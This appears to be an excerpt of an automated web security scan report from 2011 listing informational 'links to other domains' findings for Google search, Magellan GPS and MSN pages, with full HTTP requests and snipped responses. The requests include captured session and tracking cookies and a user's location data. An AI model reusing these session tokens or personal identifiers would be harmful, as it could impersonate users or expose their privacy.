<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Bnmp6YqpkVcJ:www.reuters.com/article/2010/07/02/us-google-idUSTRE66050K20100702+ita+travel&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CG4QIDAJ')">Cached</a>
...[SNIP]...
<span class=tl><a href="http://blogs.forbes.com/docket/2011/04/19/letting-it-fly-dojs-conditional-approval-of-google-ita-software-merger/" class=l onmousedown="return clk(this.href,'','','','11','','0CG8QqQIwCg')">Letting It Fly: DOJ&#39;s Conditional Approval Of Google-<em>
...[SNIP]...
<span class=tl><a href="http://www.huffingtonpost.com/eric-k-clemons/the-department-of-justice_b_851079.html?ir=Business" class=l onmousedown="return clk(this.href,'','','','12','','0CHUQqQIwCw')">The Real and Inevitable Harm From Vertical Integration of Search <b>
...[SNIP]...
<div><a href="http://www.kayak.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CH4QoggwDA')">Kayak</a>
...[SNIP]...
<div><a href="http://www.farecompare.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CIABEKIIMA0')">FareCompare.com</a>
...[SNIP]...
<div><a href="http://www.mobissimo.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CIIBEKIIMA4')">Mobissimo</a>
...[SNIP]...
<div><a href="http://www.orbitz.com/" class=l onmousedown="return clk(this.href,'','','','16','','0CIQBEKIIMA8')">Orbitz</a>
...[SNIP]...

19.134. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Apsis HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=Arvh7RneopiyMp_J1gBnwK6dUPjUg-iLEhhvnp_D5jiL5VKX_NLiPiRWmQSBdMwimsMifg4dxWitIEE9yICSOAtkSTBLprF7rndg9WUki2R-eKxI3lr2JBjCshmP3gTT

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:11:08 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/rU20-FBA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 74725

<!doctype html> <head> <title>Apsis - Google Search</title> <script>window.google={kEI:"7DS3Tf3XKImGtwexyKWfAQ",kEXPI:"17259,24472,25907,27147,28514,28766,28887,29509,29685,29822,29876",kCSI:{e:"
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=Apsis&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Apsis" class=l onmousedown="return clk(this.href,'','','','1','','0CBgQFjAA')"><em>
...[SNIP]...
<div class=osl><a href="http://en.wikipedia.org/wiki/Apsis#Mathematical_Formulas" onmousedown="return clk(this.href,'','','','1','','0CB8Q0gIoADAA')">Mathematical Formulas</a> - <a href="http://en.wikipedia.org/wiki/Apsis#Terminology" onmousedown="return clk(this.href,'','','','1','','0CCAQ0gIoATAA')">Terminology</a> - <a href="http://en.wikipedia.org/wiki/Apsis#The_perihelion_and_aphelion_of_the_Earth" onmousedown="return clk(this.href,'','','','1','','0CCEQ0gIoAjAA')">The perihelion and aphelion of ...</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:sISi6fpE1xEJ:en.wikipedia.org/wiki/Apsis+Apsis&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CB0QIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.apsisusa.com/" class=l onmousedown="return clk(this.href,'','','','2','','0CCMQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:vu8ZsN-km-UJ:www.apsisusa.com/+Apsis&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCgQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.apsisusa.com/Iindex.htm" class=l onmousedown="return clk(this.href,'','','','3','','0CCoQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:oh09ZH4u9q0J:www.apsisusa.com/Iindex.htm+Apsis&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CC8QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.apsis.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CDIQFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:HUP3mitTcsAJ:www.apsis.com/+Apsis&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CDcQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.merriam-webster.com/dictionary/apsis" class=l onmousedown="return clk(this.href,'','','','5','','0CDkQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:NDRpS7ruEtgJ:www.merriam-webster.com/dictionary/apsis+Apsis&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CD4QIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.apsis.se/" class=l onmousedown="return clk(this.href,'','','','6','','0CEAQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:yGkf2DJbRUAJ:www.apsis.se/+Apsis&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CEUQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.apsis.ch/" class=l onmousedown="return clk(this.href,'','','','7','','0CEkQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Rwbn2IADke8J:www.apsis.ch/+Apsis&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CE4QIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.apsis.ch/pound/" class=l onmousedown="return clk(this.href,'','','','8','','0CFAQFjAH')">Pound - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:zjVrDDI3WXkJ:www.apsis.ch/pound/+Apsis&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CFUQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.apsis-newsletter-pro.com/" class=l onmousedown="return clk(this.href,'','','','9','','0CFgQFjAI')">Create, send and track email newsletters with <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Uc_VDSaXSE8J:www.apsis-newsletter-pro.com/+Apsis&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CF0QIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wiktionary.org/wiki/apsis" class=l onmousedown="return clk(this.href,'','','','10','','0CF8QFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:dRcIAS3VWh4J:en.wiktionary.org/wiki/apsis+Apsis&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CGQQIDAJ')">Cached</a>
...[SNIP]...

19.135. http://www.magellangps.com/s.nl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magellangps.com
Path:   /s.nl

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /s.nl?sc=3&whence=&custcol_celigo_serialno= HTTP/1.1
Host: www.magellangps.com
Proxy-Connection: keep-alive
Referer: http://www.magellangps.com/Products/eXploristseries
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Q0VpN37HL9PBT1v5Z2ZGLH52C2T8QHJMwxQGWKxnCLrGQHjY4DnJV1TLb71TqCryvY2ngbbhwBYJvxwS95gZmdmPBTtNhlByXP6J17XqTFLLtpLShpCxYJkqfmQ1yGBW!-1425410427; NLVisitorId=rcHW8655Ac-HwJur; NS_VER=2011.1.0; __utmz=1.1303853977.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1403725269.1303853977.1303853977.1303853977.1; __utmc=1; __utmb=1.2.10.1303853977; NLShopperId=rcHW8655AeSHwA-v

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:40:27 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1577135949:73686F702D6A6176613030372E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 53685


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>
...[SNIP]...
</style>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<li><a href='https://checkout.netsuite.com/s.nl?c=1142057&amp;n=1&amp;sc=4&amp;login=T&amp;reset=T&amp;newcust=T&amp;noopt=T&amp;ck=rcHW8655AeSHwA-v&amp;vid=rcHW8655Ac-HwJur&amp;cktime=96686&amp;cart=776158&amp;gc=clear&amp;ext=F'>Create Account</a> / <a href='https://checkout.netsuite.com/s.nl?c=1142057&amp;n=1&amp;sc=4&amp;login=T&amp;reset=T&amp;ck=rcHW8655AeSHwA-v&amp;vid=rcHW8655Ac-HwJur&amp;cktime=96686&amp;cart=776158&amp;gc=clear&amp;ext=F'>Log..In</a>
...[SNIP]...
<li><a href="https://forms.netsuite.com/app/site/hosting/scriptlet.nl?script=30&amp;deploy=1&amp;compid=1142057&amp;h=19f07a9df79879e8b17f&amp;ifrmcntnr=T&amp;ck=rcHW8655AeSHwA-v&amp;vid=rcHW8655Ac-HwJur&amp;cktime=96686&amp;cart=776158&amp;gc=clear&amp;customerid=">Product Registration</a>
...[SNIP]...
<li><a href="https://forms.netsuite.com/app/site/hosting/scriptlet.nl?script=30&amp;deploy=1&amp;compid=1142057&amp;h=19f07a9df79879e8b17f&amp;ifrmcntnr=T&amp;ck=rcHW8655AeSHwA-v&amp;vid=rcHW8655Ac-HwJur&amp;cktime=96686&amp;cart=776158&amp;gc=clear&amp;customerid=">PRegistro de producto</a>
...[SNIP]...
<li><a href="https://forms.netsuite.com/app/site/hosting/scriptlet.nl?script=30&amp;deploy=1&amp;compid=1142057&amp;h=19f07a9df79879e8b17f&amp;ifrmcntnr=T&amp;ck=rcHW8655AeSHwA-v&amp;vid=rcHW8655Ac-HwJur&amp;cktime=96686&amp;cart=776158&amp;gc=clear&amp;customerid=">Enregistrement du produit</a>
...[SNIP]...
<li class="eng"><a href="https://forms.netsuite.com/app/site/hosting/scriptlet.nl?script=30&amp;deploy=1&amp;compid=1142057&amp;h=19f07a9df79879e8b17f&amp;ifrmcntnr=T&amp;ck=rcHW8655AeSHwA-v&amp;vid=rcHW8655Ac-HwJur&amp;cktime=96686&amp;cart=776158&amp;gc=clear&amp;customerid=">Register your product</a>
...[SNIP]...
<li class="ita invisible"><a href="https://forms.netsuite.com/app/site/hosting/scriptlet.nl?script=30&amp;deploy=1&amp;compid=1142057&amp;h=19f07a9df79879e8b17f&amp;ifrmcntnr=T&amp;ck=rcHW8655AeSHwA-v&amp;vid=rcHW8655Ac-HwJur&amp;cktime=96686&amp;cart=776158&amp;gc=clear&amp;customerid=">Product Registrations</a>
...[SNIP]...
<li class="spa invisible"><a href="https://forms.netsuite.com/app/site/hosting/scriptlet.nl?script=30&amp;deploy=1&amp;compid=1142057&amp;h=19f07a9df79879e8b17f&amp;ifrmcntnr=T&amp;ck=rcHW8655AeSHwA-v&amp;vid=rcHW8655Ac-HwJur&amp;cktime=96686&amp;cart=776158&amp;gc=clear&amp;customerid=">Registro de producto</a>
...[SNIP]...
<li class="fra invisible"><a href="https://forms.netsuite.com/app/site/hosting/scriptlet.nl?script=30&amp;deploy=1&amp;compid=1142057&amp;h=19f07a9df79879e8b17f&amp;ifrmcntnr=T&amp;ck=rcHW8655AeSHwA-v&amp;vid=rcHW8655Ac-HwJur&amp;cktime=96686&amp;cart=776158&amp;gc=clear&amp;customerid=">Enregistrement du produit</a>
...[SNIP]...
<li class="ger invisible"><a href="https://forms.netsuite.com/app/site/hosting/scriptlet.nl?script=30&amp;deploy=1&amp;compid=1142057&amp;h=19f07a9df79879e8b17f&amp;ifrmcntnr=T&amp;ck=rcHW8655AeSHwA-v&amp;vid=rcHW8655Ac-HwJur&amp;cktime=96686&amp;cart=776158&amp;gc=clear&amp;customerid=">Product Registrations</a>
...[SNIP]...
<li class="social"><a id="face" href="http://facebook.com/magellangps">Facebook</a>
...[SNIP]...
<li class="social"><a id="twit" href="http://twitter.com/magellangps">Twitter</a>
...[SNIP]...
<li class="social"><a id="you" href="http://www.youtube.com/magellanvideo">YouTube</a>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="https://api.qualifiedaddress.com/Scripts/Library.js"></script>
<script language="javascript" type="text/javascript" src="https://api.qualifiedaddress.com/Scripts/Qad.js"></script>
...[SNIP]...

19.136. http://www.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msn.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?euid=B506C07761D7465D924574124E3C14DF&userGroup=W:default&PM=z:1 HTTP/1.1
Host: www.msn.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expac=40II8A39_0214:WP10_5|; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37; MUID=B506C07761D7465D924574124E3C14DF&TUID=1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:36:35 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA45
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 55825
Content-Length: 55825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><body><d
...[SNIP]...
<li><a href="http://www.bltwy.com">bltwy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">SPORTS</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nfl">nfl</a></li><li><a href="http://msn.foxsports.com/mlb">mlb</a></li><li><a href="http://msn.foxsports.com/nba">nba</a></li><li><a href="http://msn.foxsports.com/nhl">nhl</a></li><li><a href="http://msn.foxsports.com/collegefootball">ncaa football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar">nascar</a></li><li><a href="http://msn.foxsports.com/foxsoccer">soccer</a></li><li><a href="http://msn.foxsports.com/tennis">tennis</a></li><li><a href="http://msn.foxsports.com/golf">golf</a></li><li><a href="http://msn.foxsports.com/fantasy">fantasy games</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/video?from=en-us_msnhp">video</a>
...[SNIP]...
<li><a href="http://money.bundle.com/mymoney">my money</a>
...[SNIP]...
<li class="last"><a href="http://msn.careerbuilder.com/msn/default.aspx?SiteId=cbmsn_home">careers</a>
...[SNIP]...
<li><a href="http://www.delish.com/">cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1">local directory</a>
...[SNIP]...
<li class="last"><a href="http://msn.whitepages.com/">white pages</a>
...[SNIP]...
<li><a href="http://royals.today.com/?FORM=MSNLED">ROYAL WEDDING</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/browse?g=royal_family#toc=0&amp;FORM=MSNLED">royal family</a>
...[SNIP]...
<li><a href="http://windsorknot.today.com/?FORM=MSNLED">blog</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">maps</a></li><li><a href="http://www.discovermsn.com">mobile</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">video</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">shopping</a></li><li><a href="http://insidemsn.wordpress.com/">corrections</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB ">feedback</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=April+26&amp;mkt=en-us&amp;FORM=MSNHPT">Tuesday, April 26, 2011</a>
...[SNIP]...
<a href="http://realestate.msn.com/slideshow.aspx?cp-documentid=28379341&amp;GT1=35006"><img src="http://col.stb.s-msn.com/i/B1/48897AE0C09E47101DFBE1A4C86D.jpg" title="Image: Real estate sign in front of house (.. Jeff Haynes/Getty Images)" width="303" height="211" alt="Image: Real estate sign in front of house (.. Jeff Haynes/Getty Images)" /></a>
...[SNIP]...
<a href="http://specials.msn.com/A-List/Entertainment/Latin-music-award-nominees.aspx?cp-documentid=28466463&amp;imageindex=1"><img src="http://col.stb.s-msn.com/i/DF/833A3CC62784C5514D9E3C674B82C.jpg" title="Image: Shakira (.. William Fernando Martinez/AP)" width="303" height="211" alt="Image: Shakira (.. William Fernando Martinez/AP)" /></a>
...[SNIP]...
<li><a href="http://msnlatino.telemundo.com/entretenimiento/Premios_Billboard_2011_ENG/photo_gallery/2011-04/all_the_finalists">Photos: 2011 Latin Music Billboard Award finalists</a>
...[SNIP]...
<li class="last"><a href="http://msnlatino.telemundo.com/entretenimiento/Premios_Billboard_2011_ENG/photo_gallery/2011-04/kings_and_queens_of_latin_music">Full coverage of the awards on Telemundo</a>
...[SNIP]...
<a href="http://www.msnbc.msn.com/id/42762039/ns/weather/?GT1=43001"><img src="http://col.stb.s-msn.com/i/EA/851A3D5A5779C3FCF01C9DCCF7453A.jpg" title="Image: A street department worker patrols a flooded neighborhood Tuesday in Poplar Bluff, Mo. (.. Jeff Roberson/AP)" width="206" height="144" alt="Image: A street department worker patrols a flooded neighborhood Tuesday in Poplar Bluff, Mo. (.. Jeff Roberson/AP)" /></a>
...[SNIP]...
<a href="http://music.msn.com/music/article.aspx?news=643162&amp;GT1=28102"><img src="http://col.stb.s-msn.com/i/BF/6A4672605F740223A9554532020D0.jpg" title="Image: Phoebe Snow performs in 1975 (.. Henry Diltz/Corbis)" width="206" height="144" alt="Image: Phoebe Snow performs in 1975 (.. Henry Diltz/Corbis)" /></a>
...[SNIP]...
<li style="width:206px;" class="last"><a href="http://msn.foxsports.com/nfl/story/NFL-draft-prospects-justin-houston-christian-ballard-failed-Combine-drug-test-042611?GT1=39002"><img src="http://col.stb.s-msn.com/i/AA/AC396DE9E6C1AE2C12ECE3962417.jpg" title="Image: Justin Houston of Georgia at the NFL Scouting Combine in February (.. Joe Robbins/Getty Images)" width="206" height="144" alt="Image: Justin Houston of Georgia at the NFL Scouting Combine in February (.. Joe Robbins/Getty Images)" /></a><a href="http://msn.foxsports.com/nfl/story/NFL-draft-prospects-justin-houston-christian-ballard-failed-Combine-drug-test-042611?GT1=39002">Source: Prospects failed drug tests</a>
...[SNIP]...
<a href="http://freshperspectives.msn.com/theme/challenge/artist/jeffreynishinaka1/videos/51?WT.mc_id=msnhp&amp;from=en-us_msnhp&amp;GT1=25081"><img src="http://col.stb.s-msn.com/i/32/155EE97E6DA2521552D8DA68EBE8A5.jpg" title="Image: Video still of sculpture by paper artist Jeff Nishinaka (.. BRW/Microsoft) " width="303" height="211" alt="Image: Video still of sculpture by paper artist Jeff Nishinaka (.. BRW/Microsoft) " /></a>
...[SNIP]...
<a href="http://money.msn.com/home-loans/home-buying-calculator.aspx?GT1=33032"><img src="http://col.stb.s-msn.com/i/B5/1BEC18756B24584CDBD43051C4CA5.jpg" title="Image: Couple with paperwork &amp; laptop (.. Tetra Images/Corbis)" width="303" height="211" alt="Image: Couple with paperwork &amp; laptop (.. Tetra Images/Corbis)" /></a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/collegefootball/story/ohio-state-buckeyes-jim-tressel-should-go-down-fighting-for-NCAA-change-042611?GT1=39002">Opinion: Tressel's way out is ...</a>
...[SNIP]...
<a href="http://lifestyle.msn.com/your-look/spring-style/staticslideshowinstyle.aspx?cp-documentid=27794053&amp;gt1=32100"><img class="portrait" src="http://col.stb.s-msn.com/i/4D/879D2CBC59109F5AC8143472E262C8.jpg" title="Image: Diane Kruger wearing white skirt (.. Spread Pictures/Fame Pictures)" width="116" height="175" alt="Image: Diane Kruger wearing white skirt (.. Spread Pictures/Fame Pictures)" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.delish.com/recipes/menu-planner/better-than-takeout-chinese-feast?GT1=47066">Better-than-takeout Chinese dishes </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/news/search?q=fire+ants+rafts&amp;form=msnhed&amp;GT1=36010">Bing: Can fire ants make rafts?</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=raccoon+purse+golf+course&amp;FORM=msnhed&amp;GT1=36010">Find: Raccoon swipes purse at golf course</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/news/search?q=god+particle&amp;qpvt=god+particle&amp;FORM=msnhed&amp;GT1=36010">Search: 'God particle' found?</a>
...[SNIP]...
<a href="http://money.msn.com/how-to-budget/article.aspx?post=e04807fc-e307-45c7-a3b0-9fdabfac3518?GT1=33029"><img class="landscape" src="http://col.stb.s-msn.com/i/A7/A9F2451016AFF381B7FEAA77BDBE96.jpg" title="Image: Woman pumping gas (.. Getty Images)" width="303" height="117" alt="Image: Woman pumping gas (.. Getty Images)" /></a>
...[SNIP]...
<a href="http://lifestyle.msn.com/your-life/better-yourself/staticslideshowglamour.aspx?cp-documentid=15188306&amp;gt1=32099"><img class="landscape" src="http://col.stb.s-msn.com/i/F4/B5C8AC92995875875DA022B31C86A.jpg" title="Image: Felice Belle (.. Aya Brackett &amp; Philippe Salomon/Glamour)" width="303" height="117" alt="Image: Felice Belle (.. Aya Brackett &amp; Philippe Salomon/Glamour)" /></a>
...[SNIP]...
<a href="http://disneydestinations.msn.com/articles/5/27584087?ocid=disneymsnhp&amp;gt1=32096"><img class="landscape" src="http://col.stb.s-msn.com/i/BF/5B3190FA2C50C44416F939E9AED92.jpg" title="Image: Mad Hatter &amp; Alice with teacups (.. Disney)" width="128" height="73" alt="Image: Mad Hatter &amp; Alice with teacups (.. Disney)" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/shopping/search?q=spring+blush+colors&amp;form=msnhed&amp;gt1=36010">Shop: Put some spring into your blush shade </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+keep+your+cool+in+a+relationship&amp;form=msnhed&amp;gt1=36010">Find: How to keep your cool in a relationship</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+long+to+keep+receipts&amp;form=msnhed&amp;gt1=36010">Bing: How long should you keep your receipts? </a>
...[SNIP]...
<a href="http://wonderwall.msn.com/music/black-eyed-peas-star-taboo-is-a-dad-again-1615774.story?gt1=28135"><img class="portrait" src="http://col.stb.s-msn.com/i/42/F2DDD5A0E57637D5488EC7CAE475A.jpg" title="Image: Taboo (.. Dan Steinberg/HP)" width="116" height="175" alt="Image: Taboo (.. Dan Steinberg/HP)" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/news/search?q=coco+ice-t+reality&amp;qpvt=coco+ice-t+reality&amp;FORM=msnhed&amp;GT1=36010">Bing: Coco &amp; Ice-T to star in reality show</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=lollapalooza+lineup&amp;form=msnhed&amp;GT1=36010">Find: Lollapalooza 2011 lineup announced</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=Gwyneth+Paltrow+Coach&amp;FORM=msnhed&amp;GT1=36010">Search: Gwyneth Paltrow is new face of Coach</a>
...[SNIP]...
<div><a href="http://msn.foxsports.com/nfl/lists/NFL-top-10-draft-myths-042211"><img class="landscape" src="http://static.foxsports.com/content/fscom/img/2011/03/14/031411-4pmET-Roger-Goodell-Sam-Bradford-FOX-FLASH-PI_20110314152439639_303_117.JPG" width="303" height="117" alt="Image: Roger Goodell and Sam Bradford of the St. Louis Rams (.. Jeff Zelevansky/Getty Images)" /></a></div><div><a href="http://msn.foxsports.com/nfl/lists/NFL-top-10-draft-myths-042211">Biggest myths about the NFL draft</a>
...[SNIP]...
<p>"You gotta come from a big school! First-year QBs can't succeed right away!" Adam Caplan <a href="http://msn.foxsports.com/nfl/lists/NFL-top-10-draft-myths-042211">debunks them all</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nfl/story/NFL-collective-bargaining-agreement-deadline-union-updates-blog-030311">Lockout updates: NFL prohibits 'football' activities</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/golf/story/Tiger-Woods-to-miss-Wells-Fargo-event-with-injury-blames-awkward-shot-in-Masters-042611">Tiger sidelined, blames awkward shot in Masters</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nfl/story/chicago-bears-qb-jay-cutler-proposes-engaged-to-reality-tv-babe-kristin-cavallari-042611">Report: NFL quarterback engaged to reality TV star</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/mlb/story/Ex-MLB-outfielder-Carl-Everett-arrested-in-Florida-042611">Ex-MLB star accused of pointing gun at wife's head</a>
...[SNIP]...
<li class="ter media"><a href="http://msn.foxsports.com/video/shows/barfly?vid=b091026b-a57c-4540-b468-fc6a52046bd4 &amp;from=en-us_msnhp">Even Cowboys owner deserves a little sympathy</a>
...[SNIP]...
<li class="ter"><a href="http://nflbuzz.yardbarker.com/blog/nflbuzz/msn/report_tcu_offensive_tackle_has_lymphoma/4626547">Report: NFL prospect diagnosed with lymphoma</a>
...[SNIP]...
<li class="ter"><a href="http://scouthoops.scout.com/2/1067340.html">NBA coach's son among best hoops prospects</a>
...[SNIP]...
<a href="http://health.msn.com/health-topics/adhd/articlepage.aspx?cp-documentid=100271092&amp;gt1=31001"><img class="portrait" src="http://col.stb.s-msn.com/i/6F/F0C39264309F339D377051EA26B9F3.jpg" title="Image: Boy sitting on tree branch (.. M. Eric Honeycutt/Vetta/Getty Images) " width="116" height="175" alt="Image: Boy sitting on tree branch (.. M. Eric Honeycutt/Vetta/Getty Images) " /></a>
...[SNIP]...
<a href="http://fitbie.msn.com/eat-right/tips/one-day-flatter-belly?gt1=50002"><img class="landscape" src="http://col.stb.s-msn.com/i/F9/7F8E46E6A58BA2FAB11F53815EE789.jpg" title="Image: Woman reaching for blueberries in bowl (.. Shuji Kobayashi/Taxi/Getty Images)" width="128" height="73" alt="Image: Woman reaching for blueberries in bowl (.. Shuji Kobayashi/Taxi/Getty Images)" /></a>
...[SNIP]...
